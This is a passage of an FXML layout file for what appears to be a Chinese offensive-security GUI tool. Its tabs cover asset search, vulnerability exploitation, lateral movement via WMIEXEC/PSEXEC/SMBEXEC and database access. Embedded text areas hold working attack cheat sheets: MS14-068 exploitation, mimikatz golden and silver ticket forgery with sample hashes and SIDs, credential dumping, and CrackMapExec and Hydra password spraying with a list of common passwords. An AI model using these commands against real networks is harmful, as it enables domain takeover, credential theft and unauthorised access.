||
</Label>
|
||
<TextField fx:id="bbTextField1" prefHeight="29.0" prefWidth="257.0" />
|
||
<ComboBox fx:id="bbComboBox1" prefHeight="29.0" prefWidth="216.0" promptText="-----查询页数(1-10)------">
|
||
<HBox.margin>
|
||
<Insets left="50.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
<ComboBox fx:id="bbComboBox2" prefHeight="29.0" prefWidth="206.0" promptText="-----是否web资产------">
|
||
<HBox.margin>
|
||
<Insets left="50.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<Label contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="121.0" text=" 查询条件" textFill="#1cad5b">
|
||
<padding>
|
||
<Insets left="3.0" top="3.0" />
|
||
</padding>
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets left="11.0" top="3.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="bbTextField2" prefHeight="29.0" prefWidth="755.0" />
|
||
<Button fx:id="bbBtn" mnemonicParsing="false" onAction="#bbBtn" prefHeight="29.0" prefWidth="108.0" text="点击查询" />
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="5.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="bbTextArea" prefHeight="729.0" prefWidth="909.0" text=" web.title="北京" 从网站标题中搜索“北京” ip.country="CN" 搜索IP对应主机所在国为”中国“的资产 icp.web_name="奇安信" 搜索ICP备案网站名中含有“奇安信”的资产 icp.name="奇安信" 搜索ICP备案单位名中含有“奇安信”的资产 domain="qq.com" 搜索域名包含"qq.com"的网站 domain.suffix="qq.com" 搜索主域为qq.com的网站 app.vendor="PHP"NEW 查询包含组件厂商为"PHP"的资产 app.version="1.8.1"NEW 查询包含组件版本为"1.8.1"的资产 header="elastic" 搜索HTTP请求头中含有"elastic"的资产 header.status_code="402" 搜索HTTP请求返回状态码为”402”的资产 web.body="网络空间测绘" 搜索网站正文包含”网络空间测绘“的资产 header.server=="Microsoft-IIS/10" 搜索server全名为“Microsoft-IIS/10”的服务器 ip="1.1.1.1" 搜索IP为 ”1.1.1.1”的资产 ip="220.181.111.1/24" 搜索起始IP为”220.181.111.1“的C段资产 ####搜索日本国家,开放6379和3389端口的机器 ip.country="JP" and ip.port="3389" or ip.port="6379" ####搜索日本国家, Apache版本是2.4.0~2.4.29,状态码为200的网站 ip.country="JP" and app.name==("Apache" and app.version=="2.4.6") and header.status_code="200" ip.port="6379" 搜索开放端口为”6379“的资产 ip.os="Windows" 搜索操作系统标记为”Windows“的资产 ip.isp="电信" 搜索运营商为”中国电信”的资产" />
|
||
<Button fx:id="bbPOCBtn" mnemonicParsing="false" onAction="#bbPOCBtn" prefHeight="900.0" prefWidth="83.0" style="-fx-background-color: #008000;" text="漏 洞 检 测" textFill="WHITE">
|
||
<font>
|
||
<Font size="20.0" />
|
||
</font>
|
||
</Button>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="5.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="Quake360">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox>
|
||
<children>
|
||
<Label fx:id="proxyStatusLabel112" contentDisplay="BOTTOM" prefHeight="22.0" prefWidth="121.0" text=" 查询条件" textFill="#1cad5b">
|
||
<padding>
|
||
<Insets left="3.0" top="3.0" />
|
||
</padding>
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font>
|
||
<HBox.margin>
|
||
<Insets left="11.0" top="3.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="bcTextField" prefHeight="29.0" prefWidth="550.0" />
|
||
<ComboBox fx:id="bcComboBox" prefHeight="29.0" prefWidth="196.0" promptText="-----查询页数(1-10)------" />
|
||
<Button fx:id="bcBtn" mnemonicParsing="false" onAction="#bcBtn" prefHeight="29.0" prefWidth="108.0" text="点击查询" />
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<TextArea fx:id="bcTextArea" prefHeight="729.0" prefWidth="909.0" text=" 【详细的参考】 https://quake.360.net/quake/#/help?id=5eb238f110d2e850d5c6aec8&title=%E6%A3%80%E7%B4%A2%E5%85%B3%E9%94%AE%E8%AF%8D country:搜索指定国家(中文添加_cn) 例如:country:"JP" city:搜索指定城市 例如:city:"tokyo " owner:搜索IP归属单位 例如:owner:"tencent.com" isp:搜索IP归属运营商 例如:isp:"amazon.com" ip:查询IP地址或网段 列如:ip:"1.1.1.1/22" is_ipv6:查询IPV6格式的IP 列如:sis_ipv6:"true" port:搜索指定的端口或服务 例如:port:"[50 TO 60]" transport:查询udp数据 例如:transport:"udp" domain:查询资产域名 例如:domain:"google.com" hostname:查询主机名包含指定资产的数据 例如: hostname:"google.com" app:搜索指定的组件 列如:app:"apache " response:查询端口原生返回数据中包含指定参数的资产 列如:response:"google.com" " />
|
||
<Button fx:id="bcPOCBtn" mnemonicParsing="false" onAction="#bcPOCBtn" prefHeight="900.0" prefWidth="83.0" style="-fx-background-color: #008000;" text="漏 洞 检 测" textFill="WHITE">
|
||
<font>
|
||
<Font size="20.0" />
|
||
</font>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="漏洞检测与利用">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="37.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<Label prefHeight="19.0" prefWidth="78.0" text="请选择脚本" textFill="#ab0f0f">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="3.0" />
|
||
</HBox.margin>
|
||
<font>
|
||
<Font name="System Font" size="14.0" />
|
||
</font>
|
||
</Label>
|
||
<ComboBox fx:id="caComboBox" nodeOrientation="LEFT_TO_RIGHT" prefHeight="29.0" prefWidth="451.0" promptText="[请选择检测脚本]">
|
||
<HBox.margin>
|
||
<Insets left="10.0" right="10.0" />
|
||
</HBox.margin></ComboBox>
|
||
<Button fx:id="caBtn1" mnemonicParsing="false" onAction="#caBtn1" text="导入URL" textFill="#e80000" />
|
||
<Button fx:id="caBtn2" disable="true" mnemonicParsing="false" onAction="#caBtn2" text="保存" textFill="#ff9513" />
|
||
<Button fx:id="caBtn4" disable="true" mnemonicParsing="false" onAction="#caBtn4" text="停止" textFill="BLUE" />
|
||
<Button fx:id="caBtn3" disable="true" mnemonicParsing="false" onAction="#caBtn3" prefHeight="25.0" prefWidth="128.0" text="开始检测" textFill="#018d4e">
|
||
<font>
|
||
<Font size="14.0" />
|
||
</font></Button>
|
||
</children>
|
||
<VBox.margin>
|
||
<Insets top="10.0" />
|
||
</VBox.margin>
|
||
<padding>
|
||
<Insets top="5.0" />
|
||
</padding>
|
||
</HBox>
|
||
<HBox>
|
||
<children>
|
||
<TableView fx:id="catableView" prefHeight="644.0" prefWidth="991.0">
|
||
<columns>
|
||
<TableColumn fx:id="catableColumnIndex" maxWidth="-1.0" minWidth="60.0" prefWidth="-1.0" text="id" />
|
||
<TableColumn fx:id="catableColumnUrl" maxWidth="906.0" minWidth="431.0" prefWidth="626.0" text="URL" />
|
||
<TableColumn fx:id="catableColumnResult" editable="false" maxWidth="498.0" minWidth="23.0" prefWidth="285.0" text="是否存在漏洞" />
|
||
</columns>
|
||
<HBox.margin>
|
||
<Insets top="10.0" />
|
||
</HBox.margin>
|
||
</TableView>
|
||
</children>
|
||
</HBox>
|
||
</children></VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="内网渗透">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="横向移动">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<VBox prefHeight="629.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="47.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="请选择方式:" textFill="#0a11ad">
|
||
<HBox.margin>
|
||
<Insets left="40.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<RadioButton fx:id="wmiRadioBtn" mnemonicParsing="false" onAction="#ChoiceExecType" text="WMIEXEC">
|
||
<toggleGroup>
|
||
<ToggleGroup fx:id="execType" />
|
||
</toggleGroup>
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="10.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
<RadioButton fx:id="psRadioBtn" mnemonicParsing="false" onAction="#ChoiceExecType" text="PSEXEC" toggleGroup="$execType">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="40.0" top="10.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
<RadioButton fx:id="smbRadioBtn" mnemonicParsing="false" onAction="#ChoiceExecType" text="SMBEXEC" toggleGroup="$execType">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="40.0" top="10.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
<RadioButton fx:id="atRadioBtn" mnemonicParsing="false" onAction="#ChoiceExecType" text="ATEXEC" toggleGroup="$execType">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="40.0" top="10.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
<RadioButton fx:id="dcomRadioBtn" mnemonicParsing="false" onAction="#ChoiceExecType" text="DCOMEXEC" toggleGroup="$execType">
|
||
<textFill>
|
||
<LinearGradient endX="1.0" endY="1.0" startX="0.7342995169082126" startY="0.8309178743961353">
|
||
<stops>
|
||
<Stop color="#b53f00" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</LinearGradient>
|
||
</textFill>
|
||
<HBox.margin>
|
||
<Insets left="40.0" top="10.0" />
|
||
</HBox.margin>
|
||
</RadioButton>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="47.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="IP地址" textFill="RED">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="execIPTextField" prefHeight="29.0" prefWidth="202.0" text="10.10.20.30">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="用 户 名" textFill="#00ff33">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="execNAMETextField" text="0x7e">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="密码/哈希" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="execPASSTextField" prefHeight="29.0" prefWidth="356.0" text="123456">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="41.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="命 令 ">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="execCMDTextField" prefHeight="29.0" prefWidth="202.0" text="ipconfig">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="认证类型" textFill="#00089a">
|
||
<HBox.margin>
|
||
<Insets left="5.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<ComboBox fx:id="execAuthComboBox" prefHeight="29.0" prefWidth="186.0" promptText="请选择认证类型">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
<Label text="编 码 选 择" textFill="#f5007a">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<ComboBox fx:id="execCharSetComboBox" prefWidth="150.0" promptText="请选择编码">
|
||
<HBox.margin>
|
||
<Insets left="5.0" top="5.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
<Button fx:id="execAttack" mnemonicParsing="false" onAction="#execAttack" prefHeight="29.0" prefWidth="195.0" text="ATTACK">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
<textFill>
|
||
<RadialGradient centerX="0.5" centerY="0.5" radius="0.7530120481927711">
|
||
<stops>
|
||
<Stop color="BLACK" />
|
||
<Stop color="WHITE" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="541.0" prefWidth="990.0">
|
||
<children>
|
||
<TextArea fx:id="execTextArea" prefHeight="537.0" prefWidth="986.0" />
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="41.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="交 互 命 令 ">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="execCMDTextField1" disable="true" prefHeight="29.0" prefWidth="471.0" text="ipconfig">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="sendAttackBtn" disable="true" mnemonicParsing="false" onAction="#sendAttack" prefHeight="29.0" prefWidth="195.0" text="发送命令">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
<Button fx:id="exitSendBtn" disable="true" mnemonicParsing="false" onAction="#exitSendBtn" prefHeight="29.0" prefWidth="148.0" text="终止">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="PTT">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="546.0" prefWidth="970.0" text="一、【MS14-068】 https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068 MS14-068.exe -u <userName>@<domainName> -p <clearPassword> -s <userSid> -d <domainControlerAddr> ms-14-068.exe -u 域用户@域控名 -p 域用户密码 -s 域用户sid -d 域控ip shell ms14-068.exe -u lisi@0x7e.local -p QWEasd!@# -s S-1-5-21-2725463498-2767612360-2474150293-1105 -d 10.20.30.11 # 获取当前主机票据 shell klist mimikatz kerberos::list # 然后清除内存中的票据 shell klist purge # 清除内存中的票据 mimikatz kerberos::purge # 使用mimikatz将生成的票证导入到内存中 mimikatz kerberos::ptc TGT_lisi@0x7e.local.ccache 二、【黄金票据】 mimikatz kerberos::golden /admin:administrator /domain:0x7e.local /sid:S-1-5-21-2725463498-2767612360-2474150293 /krbtgt:45cbc909bb09217a8a38d2b2fab7c059 /ticket:golden.kiribi #CS mimikatz "privilege::debug" "kerberos::golden /admin:administrator /domain:0x7e.local /sid:S-1-5-21-2725463498-2767612360-2474150293 /krbtgt:45cbc909bb09217a8a38d2b2fab7c059 /ticket:golden.kiribi" # 参数解释 /admin:伪造的用户名 , 随意 /domain:域名称 /sid:SID值,注意是去掉最后一个-后面的值 /krbtgt:krbtgt的HASH值 /ticket:生成的票据名称 下载到本地保存 , 然后在普通域用户的beacon导入golden.kiribi , 即可访问域控 # 查看当前内存中的票据 mimikatz kerberos::list # 清除内存中的票据 mimikatz kerberos::purge # 查看当前内存中的票据 shell klist # 手动上传黄金票据到域用户权限的主机上 # 导入黄金票据 mimikatz kerberos::ptt golden.kiribi # 查看票据 mimikatz kerberos::list 三、【白银票据】 mimikatz privilege::debug sekurlsa::logonpasswords # 或者CS直接执行 logonpasswords 这时得到了DC$的HASH值,通过mimikatz生成银票 kerberos::golden /domain:域名 /sid:SID /target:目标机器 /service:服务名 /rc4:NTLM-HASH /user:administrator /ptt mimikatz kerberos::golden /domain:0x7e.local /sid:S-1-5-21-2725463498-2767612360-2474150293 /target:dc.0x7e.local /service:cifs /rc4:f114f21f388aff360d52b340555e928a /user:silver /ptt # 参数说明 /domain:当前域名称 /sid:SID值,和金票一样取前面一部分 /target:目标主机,这里是08server-dc.SIS2112.com /service:服务名称,这里需要访问共享文件,所以是cifs ( 文件共享 ) /rc4:目标主机的HASH值 /user:伪造的用户名 /ptt:表示的是Pass TheTicket攻击,是把生成的票据导入内存 /ticket 保存到文件中 也可以使用/ticket导出之后再使用 kerberos::ptt 来导入到普通用户的内存中 mimikatz kerberos::golden /domain:0x7e.local /sid:S-1-5-21-2725463498-2767612360-2474150293 /target:dc.0x7e.local /service:cifs /rc4:f114f21f388aff360d52b340555e928a /user:silver 然后下载到本地 , 上传到已经上线的普通域用户的磁盘中 , 然后导入 , 即可访问白银票据对应的服务 ``` mimikatz kerberos::ptt ticket.kiribi ``` ">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="密码喷洒">
|
||
<content>
|
||
<VBox prefHeight="461.0" prefWidth="990.0">
|
||
<children>
|
||
<TitledPane ellipsisString="" text="常用命令">
|
||
<content>
|
||
<HBox>
|
||
<children>
|
||
<Label>
|
||
<textFill>
|
||
<RadialGradient centerX="0.8898305084745763" centerY="0.5289855072463768" focusDistance="0.28915662650602414" radius="1.0">
|
||
<stops>
|
||
<Stop color="#0043ff" />
|
||
<Stop color="#fc0000" offset="1.0" />
|
||
</stops>
|
||
</RadialGradient>
|
||
</textFill>
|
||
</Label>
|
||
<TextArea prefHeight="546.0" prefWidth="970.0" text="一、【CrackMapExec】 https://github.com/byt3bl33d3r/CrackMapExec proxychains crackmapexec smb ip.txt -u user.txt -p pass.txt --continue-on-success --pass-pol proxychains crackmapexec smb ip.txt -u ./user.txt -H hash.txt --continue-on-success --pass-pol crackmapexec smb 192.168.101.187 -u ./smb_user.txt -p 'qwe.COM123' --continue-on-success --pass-pol crackmapexec smb 192.168.101.176 -u 'administrator' -p ./smb_pass.txt --continue-on-success crackmapexec smb 192.168.101.1/24 -u ./smb_user.txt -p ./smb_pass.txt --continue-on-success crackmapexec smb 192.168.101.1/24 -u ./smb_user.txt -H '9c2225d14fca9fb7beddbefa0db46ccc' --continue-on-success crackmapexec smb 192.168.101.1/24 -u ./smb_user.txt -H ./smb_hash.txt --continue-on-success # 参数说明 smb后面的参数可以是一个ip或者是一个ip段或者是一个ip文件 -u 用户名 , 可以是单个用户名或者用户名文件 -p 密码 , 可以是单个密码或者密码文件 -H hash , 可以是单个hash也可以是hash文件 --pass-pol 查看域密码策略 --continue-on-success 如果喷射成功 , 继续喷射到结束 二、【Hydra】 hydra -L ./user.txt -P ./passwd.txt 10.20.30.1/24 smb 三、【其它工具】 https://github.com/MarkoH17/Spray365 https://github.com/ropnop/kerbrute https://github.com/dafthack/DomainPasswordSpray 四、【一些密码】 Aa123456789. 123qwer!@#$ 234qwer!@#$ 1qaz@WSX1qaz QAZwsxEDC admin!@#45 pass@123 ">
|
||
<font>
|
||
<Font size="16.0" />
|
||
</font>
|
||
</TextArea>
|
||
</children>
|
||
</HBox>
|
||
</content>
|
||
</TitledPane>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
</tabs>
|
||
<padding>
|
||
<Insets bottom="5.0" />
|
||
</padding>
|
||
<opaqueInsets>
|
||
<Insets />
|
||
</opaqueInsets>
|
||
<cursor>
|
||
<Cursor fx:constant="DEFAULT" />
|
||
</cursor>
|
||
<effect>
|
||
<Bloom threshold="1.0" />
|
||
</effect>
|
||
</TabPane>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="数据库">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<TabPane prefHeight="745.0" prefWidth="990.0" tabClosingPolicy="ALL_TABS">
|
||
<tabs>
|
||
<Tab closable="false" text="MySQL">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<VBox prefHeight="629.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="47.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="IP地址" textFill="RED">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="MySQLIPTextField" prefHeight="29.0" prefWidth="98.0" text="127.0.0.1">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="端 口" textFill="#00ff33">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="MySQLPORTETextField" prefHeight="29.0" prefWidth="66.0" text="3306">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="用户" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="MySQLUSERTextField" prefHeight="29.0" prefWidth="92.0" text="root">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="密码" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="MySQLPASSTextField" prefHeight="29.0" prefWidth="92.0" text="123456">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="MySQLtestBtn" mnemonicParsing="false" onAction="#MySQLtestBtn" text="连接测试" textFill="#1dc249">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
<ComboBox fx:id="MySQLComboBox" disable="true" onAction="#MySQLComboBox" prefWidth="150.0" promptText="请选择数据库">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
<ComboBox fx:id="MySQLComboBoxTable" disable="true" onAction="#MySQLComboBoxTable" prefWidth="150.0" promptText="请选择数据表">
|
||
<HBox.margin>
|
||
<Insets left="5.0" top="5.0" />
|
||
</HBox.margin>
|
||
</ComboBox>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="41.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="命 令 ">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="MySQLSQLTextField" prefHeight="29.0" prefWidth="724.0" promptText="select * from users;">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="MySQLEXECBtn" mnemonicParsing="false" onAction="#MySQLEXECBtn" prefHeight="29.0" prefWidth="172.0" text="执行">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
</children>
|
||
</HBox>
|
||
<HBox prefHeight="541.0" prefWidth="990.0">
|
||
<children>
|
||
<TextArea fx:id="MysqlTextArea" prefHeight="537.0" prefWidth="986.0" />
|
||
</children>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</children>
|
||
<padding>
|
||
<Insets top="10.0" />
|
||
</padding>
|
||
</HBox>
|
||
</children>
|
||
</VBox>
|
||
</content>
|
||
</Tab>
|
||
<Tab closable="false" text="ORACLE">
|
||
<content>
|
||
<VBox prefHeight="700.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="750.0" prefWidth="990.0" spacing="10.0">
|
||
<children>
|
||
<VBox prefHeight="629.0" prefWidth="990.0">
|
||
<children>
|
||
<HBox prefHeight="47.0" prefWidth="990.0">
|
||
<children>
|
||
<Label text="IP" textFill="RED">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OracleIPTextField" prefHeight="29.0" prefWidth="98.0" text="127.0.0.1">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="PORT" textFill="#00ff33">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OraclePORTETextField" prefHeight="29.0" prefWidth="55.0" text="1521">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="用户" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OracleUSERTextField" prefHeight="29.0" prefWidth="60.0" text="sys">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="密码" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OraclePASSTextField" prefHeight="29.0" prefWidth="92.0" text="123456">
|
||
<HBox.margin>
|
||
<Insets left="10.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Label text="实例" textFill="#4400ff">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="10.0" />
|
||
</HBox.margin>
|
||
</Label>
|
||
<TextField fx:id="OracleServerTextField" prefHeight="29.0" prefWidth="75.0" text="orcl">
|
||
<HBox.margin>
|
||
<Insets left="5.0" top="5.0" />
|
||
</HBox.margin>
|
||
</TextField>
|
||
<Button fx:id="OracletestBtn" mnemonicParsing="false" onAction="#OracletestBtn" text="连接测试" textFill="#1dc249">
|
||
<HBox.margin>
|
||
<Insets left="20.0" top="5.0" />
|
||
</HBox.margin>
|
||
</Button>
|
||
